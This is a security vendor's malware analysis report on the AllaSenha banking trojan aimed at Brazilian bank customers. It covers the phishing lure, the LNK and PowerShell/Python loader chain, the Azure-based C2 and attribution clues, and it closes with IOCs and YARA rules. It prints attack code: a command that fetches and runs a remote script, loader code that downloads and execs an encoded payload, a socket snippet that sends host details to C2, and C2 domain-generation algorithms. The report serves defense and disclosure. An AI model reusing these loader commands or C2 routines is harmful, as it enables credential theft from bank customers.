AllaSenha: AllaKore variant leverages Azure cloud C2 to steal banking details in Latin America (2024)

Identifier: TRR240501.

Summary

Earlier in May, our security product spotted a malicious payload, which was tentatively delivered to a computer in Brazil, via an intricate infection chain involving Python scripts and a Delphi-developed loader.

The final malicious payload, that we named “AllaSenha”, is specifically aimed at stealing credentials that are required to access Brazilian bank accounts, leverages Azure cloud as command and control (C2) infrastructure, and is another custom variant of “AllaKore”¹, an infamous open-source RAT which is frequently leveraged to target users in Latin America.

This report describes the specific infection chain that we encountered, provides associated indicators of compromise (IOCs), and presents the AllaSenha malware.

Infection chain

The infection chain that we encountered (see Fig. 1) in May ends with the deployment and execution of AllaSenha. It starts with a phishing email, leading to a malicious Windows shortcut file (LNK), which is disguised as a PDF file and distributed through WebDAV.

We could also identify likely previous variants of some of the described malicious tools, which were delivered in 2023, abusing public cloud hosting services (such as Autodesk A360 Drive or GitHub) to host malicious payloads. The final payloads were decrypted using the same techniques as the ones that are implemented by BPyCode (see later).

From the various reliable chronological information we could obtain about the malicious LNK and the staging servers they were served from, we believe with medium confidence that the attackers switched to the exact infection chain we describe in this report starting March 2024.

Infection vector

Thanks to cooperation, we could precisely identify a phishing email from which the infection chain that we describe started. While we cannot share the full content of this exact email, we retrieved several almost identical samples from late April 2024, leading to the exact same infection chain and phishing website:

The phishing email impersonates a notification for an electronic invoice (“Nota Fiscal de Serviços Electrônica”¹¹ or “NFS-e” in Portuguese),which appears to be frequent against targets in Brazil¹², as such electronic invoicing process is common, and even mandatory in some circ*mstances since September 2023. The phishing email samples that we retrieved are all visually very close, but the subject and exact content vary slightly, likely just enough to possibly defeat some elementary content-based spam filters. We identified the following subjects from retrieved email samples: NFS-e Emitida, Segue a NFe gerada, Nota Fiscal gerada, Nota Fiscal – <an identifier>.

Malicious emails contain a link to the is[.]gd link shortener (such as hxxps://is[.]gd/As1idV?0192524.3043), which redirects to a phishing website (see Fig. 3), hosted on a dedicated domain (nfe-digital[.]digital), through a URL matching this pattern: hxxps://notafiscal.nfe-digital[.]digital/nota-estadual/?notafiscal=<an identifier>

Phishing webpages include a button which links to a Windows search: protocol¹³ URL. The latter enables displaying files from a remote WebDAV server in a standard Windows Explorer window (see Fig. 4 in next title):

<a href="search:query=NotaFiscal.pdf&crumb=location:\\191.232.38[.]222@80\Documentos&displayname=Downloads" download=""> <img class="pdf-icon" src="Nota%20Fiscal_files/pdf-icon.png" alt="Ícone de PDF" /></a>

Malicious LNK

If a targeted user clicks the button on a phishing page, a standard Windows Explorer window is displayed to the user (see Fig. 4), listing the files that are staged at the remote WebDAV path: a malicious LNK file which is poorly masqueraded as a PDF document (NotaFiscal.pdf.lnk, SHA-256 8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535), and a directory (dc, which contains BPyCode launcher, a malicious BAT file):

\\191.232.38[.]222@80\Documentos\├── dc/│ └── c.cmd└── NotaFiscal.pdf.lnk

The targeted user, lured into thinking a PDF invoice must be opened, is expected to execute the malicious LNK (NotaFiscal.pdf.lnk). The LNK file in turn runs a Windows command shell, which creates and opens² a fake invalid PDF file (NotaFiscal.pdf) in the user’s Downloads folder, then triggers the download and execution of BPyCode launcher (c.cmd):

%windir%\system32\cmd.exe /min /c "echo Indisponivel > %userprofile%downloadsNotaFiscal.pdf & start %userprofile%\downloads\NotaFiscal.pdf& start /min cmd.exe /c "\\191.232.38[.]222@80\Documentos\dc\c.cmd""

We could identify several similar additional WebDAV paths and malicious LNK files, which are all listed in Appendix.

BPyCode launcher

The malicious LNK we described downloads and runs a malicious BAT payload (c.cmd, SHA-256 8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535), that we named “BPyCode launcher”, as part of its execution logic.

BPyCode launcher merely launches a base64-encoded PowerShell command. The resulting PowerShell script downloads the Python binary from the official python.org website, and drops it to a created folder³, in the C:\Users\Public directory:

cd $ENV:public$CP = ($env:COMPUTERNAME -replace "-","") -replace "DESKTOP", ""$CP2 = -join ($CP[-1..-($CP.length)])$CP3 = $CP2.ToLower()$Folder2 = "${ENV:public}\$CP3"if (!(Test-Path -Path $Folder2 -PathType Container)) { Invoke-WebRequest -URI https://www.python.org/ftp/python/3.10.0/python-3.10.0-embed-win32.zip -OutFile "$CP3.zip"; Expand-Archive "$CP3.zip" -DestinationPath $Folder2; Copy-Item -Path "$Folder2\pythonw.exe" -Destination "$Folder2\$CP3.exe"}& "$Folder2\$CP3.exe" -c """import base64; exec(base64.b64decode('''''''''<BASE64-ENCODED PYTHON SCRIPT>''')); exit()""";

This PowerShell launcher uses the downloaded and renamed Python interpreter to further execute a base64-encoded Python script, which we named “BPyCode”.

Stage 1 – BPyCode: a Python DLL downloader and loader

BPyCode is a Python script that is in charge of downloading a DLL (“ExecutorLoader”), and executing it in-memory. The script was decoded from base64 (by the BPyCode launcher script), and never written as a file, so providing a hash to identify the exact BPyCode sample we analysed would not be relevant. However, BPyCode later writes a variant of itself as a file (SHA-256 6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e) during persistence setup – we listed all identified BPyCode files hashes in Appendix anyway.

BPyCode uses a domain generation algorithm (DGA) to generate a list of 3 hostnames (of the following pattern: <DGA>.brazilsouth.cloudapp.azure[.]com), as well as a list of 10 TCP ports. BPyCode tries to download a payload from one of the possible combinations of the generated hostnames and ports, and retries with additional combinations until it receives data.

# Hostnames generation algorithm from BPyCodedef lk(): import hashlib from datetime import date try: d = date.today() wi = d.weekday() di = d.day + wi l = 'fghijlmnopqrstuvxzwkyjlmnopqabcghjlabcde'[di] r = [] for _ in range(50, 61, 5): t = hashlib.sha1(f"{di*wi*_}{l}{wi}{l}{d.month * di*_}{l}{d.year*di*_}".encode()).hexdigest()*10 r.append(t[:_].replace(t[:di], l).lower()) return r except: return [f'google{di}']

Generated hostnames seem to match those that are associated with the Microsoft Azure Functions⁴ service, a serverless infrastructure that in this case would allow operators easily deploy and rotate their staging infrastructure.

The protocol that is used to download from staging servers is raw TCP. Before waiting for server-emitted data, BPyCode sends an identifier (pyCodeV10 - *NEWW*) and some basic information about the targeted computer (host’s processor name, Windows version and current username):

with ss.socket(ss.AF_INET, ss.SOCK_STREAM) as s: s.settimeout(30) s.connect((f'{choice(lk())}.brazilsouth.cloudapp.azure.com', choice(ptV5()))) s.send(f'pyCodeV10 - *NEWW* {ss.gethostname()} | {vs} | {pr}'.encode())

The data that BPyCode expects in return is a Pickle⁵-serialized dictionary which contains:

• an additional Python loader script to execute;
• a ZIP archive which contains the “PythonMemoryModule”⁶ Python package, which is aimed at loading a DLL in-memory;
• another ZIP archive which contains ExecutorLoader, a PE library.

Both ZIP archives are encrypted (ZipCrypto) with the same password: Snh2301**Snh2301**.

The additional Python loader script that is provided by the server is executed in-memory from BPyCode (via the eval Python function):

• it sets BPyCode persistence up, by writing a variant of a BPyCode script under C:\Users\Public\<filename>.txt (where <filename> matches the folder name which is created by the BPyCode launcher³), and creating a registry run key at HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<filename>;
• it decrypts and extracts downloaded ZIP archives in memory;
• it leverages the PythonMemoryModule to dynamically load ExecutorLoader in-memory, then runs its entrypoint (the export namedForce).

During our analysis, we tried to alter the identifier that is sent from BPyCode to the staging servers (pyCodeXXX...) before downloading further data, and as a result we were able to obtain different payloads, but all match the delivery process that we describe, and ultimately lead to AllaSenha.

We also noted that the password which is used to protect downloaded ZIP archives may be extensively reused by the threat actor, as we were able to decrypt older and publicly available payloads using the same one. Decrypting older payloads also yielded different AllaSenha samples.

A last interesting detail is that BPyCode contains a sort of “killswitch” mechanism, as it will stop its execution in case the targeted computer’s processor name contains Broadwell. Broadwell is an Intel microarchitecture that was discontinued in 2018. The goal of this killswitch is not clear, but we speculate that this condition allows attackers to filter out appliances that are of no interest for the operators (the final payload being dedicated to workstations), or to avoid execution from some sandboxes we could not identify.

Stage 2 – ExecutorLoader: a simple Delphi-developed DLL loader

ExecutorLoader is a Borland Delphi (10.4) developed DLL which exports a single function called Force. This DLL is downloaded and executed in-memory by BPyCode, and is aimed at further decoding and executing the final payload (in our case, AllaSenha) which is embedded as a resource. To do so, ExecutorLoader injects the payload into a (renamed) mshta.exe instance.

The Force function first copies the system’s mshta.exe binary to another file using a random name, under a directory chosen in a predefined list:

ExecutorLoader launches the copied binary using CreateProcessW, then loads one of its own resources (named RcDll) which holds a UPX-packed DLL (SHA-256 65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841 – which in our case is AllaSenha). The mshta.exe process is opened, memory is allocated using VirtualAlloc and the loaded resource is copied inside this allocated region:

A thread is then created inside the remote mshta.exe process, to run the final payload (AllaSenha).

We could identify some older versions of ExecutorLoader, distributed as an executable binary, called Execute_dll.exe (and usually stored in a ZIP file called Execute_dll.zip, which would be encrypted using the same password as the one used by BPyCode). The code of this executable is exactly the same as the described DLL version, except of course for the entrypoint. This executable version has notably been hosted on GitHub at https://raw.githubusercontent[.]com/marinabarros320168/new/main/Execute_dll.exe.

AllaSenha, an AllaKore RAT variant

The final payload which is deployed from ExecutorLoader is a banking trojan that we named “AllaSenha”, and which is comprised of a single Windows 32bits UPX-packed DLL (once unpacked using UPX 4.2.2, its SHA-256 is ac4b4b6cfe4d4e8710384246c008764cdb7547a6c3081e72687fefdf0614c7a5).

AllaSenha targets Brazil’s main banks, such as Sicredi, Itaú Unibanco, Caixa, Banco Brazil, or Sicoob and aims at stealing passwords, 2-factor authentication (2FA) tokens and QR codes.

AllaSenha leverages Azure cloud as C2 infrastructure. It implement a DGA (in functions called GeraHost and GeraPorta – “Generate Host” and “Generate Port” in Portuguese), which generates a C2 hostname in the .brazilsouth.cloudapp.azure[.]com domain, as well as a port to connect to. AllaSenha DGA is different than the one in BPyCode, is based on the execution date, and may vary depending on the bank for which credentials are exfiltrated (one DGA modifier applies to Banco do Brasil only, another to Itaú Unibanco only). A reproduction of AllaSenha DGA is provided in Appendix – as an example, nhefxgbdedndzhebcfedufbgkfecgbccfecgbcc.brazilsouth.cloudapp.azure[.]com is a C2 hostname which has been generated on 2024-05-27.

Just like BPyCode, C2 communications between the malware and the server use raw ASCII text over a TCP socket. To handle part of these communications, AllaSenha appears to include a Delphi open-source library called ServerSocket⁷, allowing basic RAT functionalities such as keyboard and mouse control, as well remote desktop capabilities. Interestingly, while AllaKore¹ and ServerSocket do not seem to be directly related, both projects use the same name pattern for C2 commands (<|COMMAND|>), which may indicate that they are either often used in conjunction or inspired after one another.

All AllaSenha samples that we retrieved use Access_PC_Client_dll.dll as their original file name. This name can notably be found in the KL Gorki⁸ project, a banking malware which seems to combine components of both AllaKore and ServerSocket. As a result, we believe with medium to high confidence that AllaSenha is initially based on the KL Gorki source code in particular.

The list of commands found in AllaSenha offer a glimpse of malware’s capabitities:

<|ASS-BLUE-PJ|><|ASS-BLUE|><|ASS-SANTA|><|BB-AMARELO|><|BB-AZUL|><|BB-PASS6|><|BB-PASS8|><|BB-PROCURADOR|><|BLOQUEAR|><|CLOSEKEYBOARD|><|DESCO-TKAPP|><|DESCO-TKCHAVEIRO|><|FECHAR-ANYDESK|><|ITAU-SNH-CARTAO|><|ITAU-SNH-ENTRADA|><|ITAU-TK-APP|><|ITAU-TK-CHAVEIRO|><|ITAU-TK-SMS|><|LIMPAR-TECLAS|><|PRINCIPAL|><|PUXAR-TECLAS|><|QR-CONFIRMADO|><|REQUESTKEYBOARD|><|SAFRA-DADOS|><|SENHA|>Ass: <|SICOOB-HEIGTH|><|SICREDI-TOKEN-CELULAR|><|SICREDI-TOKEN-CHAVEIRO|><|START-CAPTURA|><|STN-6DG|><|STOP-CAPTURA|><|TAMANHO|><|UNICRED-ASS|><|UNICRED-TKN|>

Upon launch, AllaSenha reads the user’s browser data to search for credentials associated with targeted banks. If AllaSenha is unable to find any, it enters a “waiting” state in which it starts multiple threads to check if the user is performing actions associated with banking. Actions that can get AllaSenha to leave its waiting state include Internet browsing to a targeted banking website, the usage of the itauaplicativo.exe (from Itaú Unibanco) desktop application, or the saving of passwords associated with targeted banks in the browser password database. AllaSenha does not communicate with C2 servers if it has not found data of interest.

To deal with 2FA, which is enabled on most banking websites, AllaSenha has the ability to display dedicated hijacking windows requiring the targeted users to proceed with a second factor. Using the <|TRAVAR|> command, operators can freeze user’s desktop with a fake bank security plugin load screen:

We believe this screen exists to give operators some time to interact with AllaSenha while trying to use stolen credentials for transactions. Operators can then issue AllaSenha commands to display 2FA validation windows on targeted user’s desktop, depending on the bank they are trying to connect to. For instance, operators can require a targeted user to validate an operator-initiated transaction by scanning a QR code, and entering a confirmation secret which would be provided by the Brasdesco mobile application (the QR code has been redacted in the following capture):

Multiple 2FA windows are available for operators to hijack tokens of different types, such as in-app tokens, SMS tokens and QR codes.

Infrastructure

The threat actor most notably leverages the gd[.]is link shortener and dedicated domains as part of its phishing infrastructure, as well as Azure cloud infrastructure as payload stagers and C2 servers.

Phishing websites

Links in phishing emails leverage the is[.]gd link shortener to redirect to dedicated phishing domains. The malicious email samples that we retrieved all ultimately lead to phishing URLs on those 2 hostnames: notafiscal.nfe-digital[.]digital, nota-fiscal.nfe-digital[.]top.

Hostnames resolves to Cloudflare IPs, but original content is likely hosted at HostGator Brazil¹⁴, as can be guessed from HTTP error pages that are displayed by phishing websites in case of an invalid URL. Associated domains were both registered on the 2024-04-26 at Go Daddy, and set to use Cloudflare name servers.

Pivoting from the described characteristics, we identified 2 additional and similar domains that were registered on the 2024-04-25, and that we believe with medium confidence have been (or could be) used as part of a phishing infrastructure: nfe-digital[.]online, nfe-digital[.]site.

Stagers

The WebDAV server which delivered the malicious LNK in the case that we described (191.232.38[.]222@80) had been setup the day before, and taken down the day after. This server only had a single HTTP server running on port 80, with a default Apache 2 index page. On this server, whose IP belongs to Microsoft (ASN 8075) and which is located in Brazil, a /Documentos directory containing a malicious LNK and a BPyCode launcher was staged.

We identified several other WebDAV paths matching Microsoft IPs in Brazil, which hosted both a NotaFiscal.pdf.lnk malicious LNK file (all samples that we retrieved triggered the same actions than we described) and a malicious BAT downloader:

We could identify several additional WebDAV paths from malicious LNK samples, but we could not retrieve reliable chronological and exposed services information for the associated servers – they are all listed in Appendix.

The DGA function in BPyCode takes the current date as an argument to generate 3 distinct hostnames. We could determine that associated generated hostnames were setup to deliver payloads daily. At the time of writing, the threat actor seem to have stopped using *.brazilsouth.cloudapp.azure.com hostnames for payload delivery. The DGA methodology leveraged to connect to Azure-hosted (possibly “serverless”) infrastructure shows that the threat actor tried to automate the creation and rotation of its delivery infrastructure.

C2 servers

Command and control servers were also hosted on Azure cloud infrastructure. As described in the sample analysis, AllaSenha also implements a DGA which ensures a daily C2 hostnames rotation. At the time of writing, newly generated domains appear to be inactive, indicating that attackers may have either paused their activity, changed their C2 infrastructure or modified their DGA.

Attribution

We could not reliably link the described activities to a known and consistently defined threat actor.

Yet the malicious files we analysed contained some clues that might be useful for attribution. The initial malicious LNK for instance contained information about the computer from which the file was created:

ParsingPath: C:\Users\bert1m\Desktop\test.htmlFolderPath: C:\Usuários\bert1m\Área de TrabalhoMAC address: 94:53:30:e7:6f:42Hostname: desktop-20a11ho

We can note that the local language of the computer on which the LNK file was generated is Portuguese (C:\Usuários\) – this is consistent with the targeting of AllaSenha (see below) and further language clues in BPyCode. AllaSenha samples that we retrieved (for instance, SHA-256 278897ee9158f9843125bc2e26c14f96c4e79d5fc578b7e5973dc8dc919a3400) also contained unstripped source code paths using the same bert1m username:

C:\Users\bert1m\Desktop\Meu Driver\DELPHI XE5\Cliente\ZLibExApi.pasC:\Users\bert1m\Desktop\Meu Driver\DELPHI XE5\Cliente\Conectar.pas

This suggests that a single individual going by the bert1m nickname could be responsible for the development of multiple parts of the infection chain, from infection to the final malware. This however does not necessarily demonstrate that the developer is directly involved with the operation of such tools.

When searching for the bert1m nickname, we were able to find several public social media profiles, 2 of them at least matching Portuguese-speaking individuals, but could not reliably link any of those profiles further with any malicious activity or files.

Targets

Strictly sticking to the infection chain that we described and the resulting AllaSenha samples, we could only (and reliably) identify targets in Brazil. We do not benefit from enough contextual data to determine if individuals or organizations were specifically targeted.

Based on AllaSenha analysis, we can determine that the threat actor is specifically gathering credentials to access the following banks:

• Banco do Brazil;
• Bradesco;
• Banco Safra;
• Itaú Unibanco;
• Sicoob;
• Caixa Econômica Federal.

Conclusion

The ecosystem of cyber threats that specifically target Latin America^9,10 is the home of peculiar malware samples and uncommon practices – but those are sometimes combined to well known infection or delivery techniques that are quite usual to the cybercrime landscape. Attackers keep regularly changing malicious infrastructure, infection methods and loaders to evade defenses, and while used techniques remain relatively simple, the lack of documentation and the determination of these groups make them a real threat.

The threat actors that operate in Latin America appear to be a particularly productive source of cybercrime campaigns. While almost exclusively targeting Latin American individuals to steal banking details, these actors often end up compromising computers that are indeed operated by subsidiaries or employees in Brazil, but that belong to companies all around the world. As a result, such threats should not be underestimated and require proper response, way beyond the Brazilian borders.

Appendix

Indicators of compromise (IOCs)

Associated IOCs are also available on our GitHub repository.

Hashes (SHA-256)

f848c0f66afc7b5a10f060c1db129529a974ae0ad71a767f7c7793351bb7ca04|Malicious LNK (NotaFiscal.pdf.lnk)c300749ea44f886be1887b3e19b946efbdbbc3e1bf3e416c78cfbff8d23bf70a|Malicious LNK (NotaFiscal.pdf.lnk)0d94547a0b8f9795e97e2a4a58b0ece65b4ea4b6e6019cbc96e1c79f373b4587|Malicious LNK (NotaFiscal.pdf.lnk)d9877dc1ba0f977d100e687da59c216454d27e3988532652ac8f6331debbd071|Malicious LNK (NotaFiscal.pdf.lnk)a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef|Malicious LNK (NotaFiscal.pdf.lnk)21e22c4736e7567b198b505ed303c3ca933e0c2d931b886756f6db18a9884a75|Malicious LNK (NotaFiscal.pdf.lnk)2c1251ae1ec9d417bbbdd1f6ac99baa3f16a7639d0c12cb2883ef8c22c73e58e|Malicious LNK (NotaFiscal.pdf.lnk)e50bde1e319e699f587d3b5403c487e46deed61cc3f078fe951e7cb9f6896259|Malicious LNK (NotaFiscal.pdf.lnk)f00cb0603c055c85c7cdf9963d919d527b13013c182dc115ba733d28da57b1d9|Malicious LNK (NotaFiscal.pdf.lnk)2c53b4dc15882cf22772994d8ed0947e4a8b70aef3a12ab190017b3317c167ea|Malicious LNK (NotaFiscal.pdf.lnk)46e754727efdc2c891319d25a67ee999a4d8a0b21b0113db08eead42cf51b780|Malicious LNK (NotaFiscal.pdf.lnk)cd9f5773bd7672a3e09f2d05ef26775e8c7241879d5f4d13c5c5bc1704c49fa1|Malicious LNK (NotaFiscal.pdf.lnk)8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535|Malicious LNK (NotaFiscal.pdf.lnk)1b4f44a00f61b3e0c8cd6c3125f03b6d4897d6ab90c8a6dc899ed96acee80dd6|Malicious LNK (NotaFiscal.pdf.lnk)4546bc56c85ad2967859dc34b2c84f15891fcd192e86bfc630c49dc8d59e3e71|BPyCode launcher (c.cmd)40c37bfcc9b0e0d1b3840cb7c751162fec91fe833d4caf4a17bc8b97d53c88b5|BPyCode launcher (c.cmd)a839dfbe1e7979dbd15ef6c5e472afb3efca044ee8ad27185b01161ce01e4f36|BPyCode launcher (a3.cmd)610f0ec33603ef4d1fd6530a8f6b0121a4c9cc62fb6fa2ceee8e2f5b2f866e4c|BPyCode launcher (a3.cmd)c0bf82a3f7807e0c88076e0d500b07e253b106914058b02e112d45eeb6209998|BPyCode launcher (a3.cmd)6f05d8f85384808036d3c77732b056e2b9cd429587a77b6be3ccdbd4bb558023|BPyCode launcher (a3.cmd)3962c8a4d0472f91d4be45140eccf661ad6c579319953156dec438dc6a07eeb2|BPyCode launcher (a3.cmd)b2e1f630c4593830ead91e7f3615d8d5214762dc5a1dd65bef7382d6f6c9f258|BPyCode launcher (a3.cmd)010d9f1f16c01db5ff37ff9b519d7ecf3be096e00ae597d7bec12b7099b2f852|BPyCode launcher (a3.cmd)eb2cd71e72ff676d80eb746b961840fea3601d8f6402201d7c0e849a670240ee|BPyCode launcher (a3.cmd)643563613fb78f88fd90a6cf253ace9e9e6686568fdf6b6d7ec9760667d4d72b|BPyCodef2db799d892f2a7ac82bfa15826e74d778abdfa153ccafb9db1fdf56a0248a40|BPyCoded051c0aee007f2a1d0026330719a45e81c726251015837e66cf9348df3bd7210|BPyCodedd3f1829cc743942d1fc3719c8d8162bc45ca624352ac71f43c08dafd54bbb7f|BPyCode8a1aba66841ae4b20df95eea8a271538453a76a53596fd3254d47d4d57a3ab3a|BPyCode3b450994add1e3a206c56a7f8fd28e4132cffb27f3df345e07e8908d7989751f|BPyCode35329c2fb7a1844576a5defd5d9a7d250d78db51479b2612e3923e18539b0695|BPyCode19c02c5724622be4eedff95633f3fbaa604449aa50cc0761693bb8adb1e8cf97|BPyCode5782b9bc96ce5ad011c122496ff0ff0dc08d6444c6d2e98606ada82130d5f21a|BPyCode6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e|BPyCode persistence (C:\Users\Public\<filename>.txt)99d0de52a63e5ff790e468dbb8cd0d5273b51ca3b67b5963c0bdedc3a4f44f12|ExecutorLoader (executor.dll)3b0eb25ed6c0dff76a613bdcfd20ca1d2f482e3c1739747bf50834ca784e66bb|ExecutorLoader (executor.dll)19594c51c61fc5fd833ddd0eecb648acebdf4d789b337f00cda0a03efbb1afcf|ExecutorLoader (executor.dll)7e0051d9221c13a47245359a2cd2804b4d3d9302a321fc8085da1cf1a64bac91|ExecutorLoader (Execute_dll.exe)b8b3963967232916cd721a22c80c11cd33057bd5629dcfa3f4b03d8a6dbf1403|ExecutorLoader (Execute_dll.exe)e7aa64726783ec6f7249483e984ae20b31a091a488a3ed0f83c210702c506d20|ExecutorLoader (Execute_dll.exe)65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841|UPX-packed AllaSenhaac4b4b6cfe4d4e8710384246c008764cdb7547a6c3081e72687fefdf0614c7a5|UPX-unpacked AllaSenhab152346c2679392d7e15d1cc72a39a21d24e55360c4c1c845ef3524924e93fa9|AllaSenha7232e3318fdc370e611b2bcbaaec3d58a0d687927714c24dc81fe60767d53a31|AllaSenha883c49b7c869019951eff94699480a7ecc97c9c45060a15797ecbd5fce060d26|AllaSenha561e6a42e23d12abe6bba8c98f84c3ba7c45a5df840bfa6fd0dfea803c9b4b7e|AllaSenhaab3a284ae6e4e466a0715c162cfab85d75522bec48fa25947b16a0891ec2358a|AllaSenha278897ee9158f9843125bc2e26c14f96c4e79d5fc578b7e5973dc8dc919a3400|AllaSenha3c89775ae7c35fe3d1ec7e75ac9d4a19959d082d31ab412af243125440ffea6c|AllaSenha

Domains

nfe-digital[.]digital|Phishing URLs root domainnfe-digital[.]top|Phishing URLs root domain

Possibly malicious and/or associated domains

nfe-digital[.]online|Possibly malicious and/or associated domainnfe-digital[.]site|Possibly malicious and/or associated domain

URLs

\\abrir-documento-adobe-reader-1.brazilsouth.cloudapp.azure[.]com@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\104.41.57[.]122@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.235.235[.]69@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\4.203.105[.]118@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.234.212[.]140@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.233.241[.]96@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.232.38[.]222@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.239.116[.]217@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\104.41.51[.]80@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.235.233[.]246@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.233.248[.]170@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.239.123[.]241@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\191.235.87[.]229@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)\\20.197.250[.]132@80\Documentos\|WebDAV stager path (on legitimate Azure infrastructure)hxxps://raw.githubusercontent[.]com/marinabarros320168/new/main/Execute_dll.exe|ExecutorLoader staging URL (on legitimate Github infrastructure)hxxps://raw.githubusercontent[.]com/alexiadarocha195267/rp/raw/main/Execute_dll.zip|ExecutorLoader staging URL (on legitimate Github infrastructure)hxxp://jucatyo6.autodesk360[.]com/shares/download/file/SHd38bfQT1fb47330c999c2a86b9a6d091b6/dXJuOmFkc2sud2lwcHJvZDpmcy5maWxlOnZmLnY0Uk5ubHlyU0JXd0hlLXJyZWk0T2c_dmVyc2lvbj0x?bfccc0fd975348c980dd89e57f94815f|Stager for a likely associated and previous variant of BPyCode execution (on legitimate AutoDesk infrastructure)hxxps://dpsols7.autodesk360[.]com/shares/download/file/SHd38bfQT1fb47330c99c55d44aacebd2ec7/dXJuOmFkc2sud2lwcHJvZDpmcy5maWxlOnZmLjhZc1hBS2Q2VHNDa0Z1NkZ0Q2tQdHc_dmVyc2lvbj00?b44bb61abebf41d695a4580f072d9b74|Stager for a likely associated and previous variant of BPyCode execution (on legitimate AutoDesk infrastructure)

YARA rules

rule allasenhamaycampaign_executorloader{ meta: description = "Detects Delphi ExecutorLoader DLLs and executables." references = "TRR240501" date = "2024-05-28" author = "HarfangLab" context = "file,memory" strings: $delphi = "Embarcadero Delphi" ascii fullword $s1 = "\\SysWOW64\\mshta.exe" wide fullword $s2 = "\\System32\\mshta.exe" wide fullword $s3 = "RcDll" wide fullword $default1 = "Default_" wide fullword $default2 = "Default~" wide fullword condition: $delphi and all of ($s*) and any of ($default*)}rule allasenhamaycampaign_allasenha{ meta: description = "Detects AllaSenha banking trojan DLLs." references = "TRR240501" date = "2024-05-28" author = "HarfangLab" context = "file,memory" strings: $a1 = "<|NOSenha|>" wide fullword $a2 = "<|SENHA|>QrCode: " wide fullword $a3 = "<|SENHA|>Senha 6 : " wide fullword $a4 = "<|SENHA|>Snh: " wide fullword $a5 = "<|SENHA|>Token: " wide fullword $a6 = "<|BB-AMARELO|>" wide fullword $a7 = "<|BB-AZUL|>" wide fullword $a8 = "<|BB-PROCURADOR|>" wide fullword $a9 = "<|ITAU-SNH-CARTAO|>" wide fullword $a10 = "<|ITAU-TK-APP|>" wide fullword $dga = { 76 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 78 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 7A 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 77 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 6B 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 79 00 00 00 } condition: $dga and (4 of ($a*))}

AllaSenha DGA

This Python code snippet is reproducing the logic of AllaSenha’s domain generation algorithm (which is generating C2 hostnames).

import datetimedef day_to_letter(i): if i > 26: i //= 2 return "_abcdefghijlmnopqrstuvxzwky"[i]def to_signed_str(unsigned_value): """ Converts an integer into the corresponding signed value, returned as a string. :param unsigned_value: The input integer to convert :return: The corresponding string """ bit_length = 32 if unsigned_value >= 2**(bit_length - 1): signed_value = unsigned_value - 2**bit_length else: signed_value = unsigned_value return str(signed_value)def intstr_to_domain(s): """ The input is a string which contains only digits. This function takes them either one or two at a time to be used as indexes in a hardcoded array. If taking two digits makes for too big an index, only one is used - this explains the huge disparity in the distribution of letters. :param s: :return: """ key = "__abcdefghijlmnopqrstuvxzwky" out = "" i = 0 while i < len(s): if i == len(s) - 1 or int(s[i:i+2]) >= 28: if int(s[i:i+1]) >= 2: out += key[int(s[i])] i += 1 else: if int(s[i:i+2]) >= 2: out += key[int(s[i:i+2])] i += 2 return out.rstrip('_')d = datetime.datetime(year=2024, month=5, day=28) # Change to the desired dateday_of_year = d.timetuple().tm_ydayday_of_week = (d.weekday() + 1) % 7 + 1week_of_year = d.isocalendar()[1]domain = day_to_letter(d.day)key = { "ITAU-APP": 0x55, "BB": 0x56, "default": 0x57}multiplicator = key["default"]calculus1 = d.day**2 * day_of_year * multiplicator**3 & 0xFFFFFFFFcalculus2 = day_of_year**2 * d.day * multiplicator & 0xFFFFFFFFcalculus3 = day_of_year * d.day * multiplicator & 0xFFFFFFFFcalculus4 = d.month * day_of_year * d.day * multiplicator & 0xFFFFFFFFcalculus5 = week_of_year * day_of_year * d.day * multiplicator & 0xFFFFFFFFinput_str = (f"{to_signed_str(calculus1)}{to_signed_str(calculus2)}{to_signed_str(calculus3)}{to_signed_str(calculus4)}" f"{to_signed_str(calculus5)}{to_signed_str(calculus5)}")print(domain + intstr_to_domain(input_str) + ".brazilsouth.cloudapp.azure[.]com")

Published on 28 May, 2024 Last update on 30 May, 2024